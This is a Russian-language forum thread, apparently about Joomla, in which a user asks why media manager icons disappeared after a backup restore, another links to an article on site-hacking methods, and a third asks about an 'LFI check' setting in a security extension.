Ясно,спасибо,значит и у меня так должно быть,я же в тоности сделал такие же настройки
Благодорю вас

Хотел бы поинтетесоватся

У меня пропали иконки в медиа менеджере,такое стало у меня после того когда я востанавил сайт  резервной копии,до этого работало все нормально
Проверил модули иконок в админ панели они включены

Вот скриншот нормальной панели медиа менеджера
Тут скриншот где как нормально работает панель

А вот тут уже где не норамльно,на данный момент у меня так
Тут скриншот другой где неправильно работает панель


Я как понял,иконки находяться тут administrator/components/com_media/images,помотрел изоброжения и конки все наместе,немогу понять в чем причина
Нет не фото папок не иконок крестики удалить,вообщем на скриншотах все наглядно видно
Помогите если сможете
Надеюсь мою белеберду поняли,не знаю как еще обьяснить 
Помогите пожалуйста,а то что страшная панель меда менеджера нехочется заходить в нее
Не сердитесь за мое неграмотное письмо
Заранее благодорю
[/quote]

Кому интересно, здесь описание методов взлома сайтов
http://www.xakep.ru/post/49508/

wishlight, а не подскажешь. Параметр "LFI check only on canonical" - "проверка только чего?" А то когда в да ставлю, и имитирую взлом, писма не идут, а в нет идут.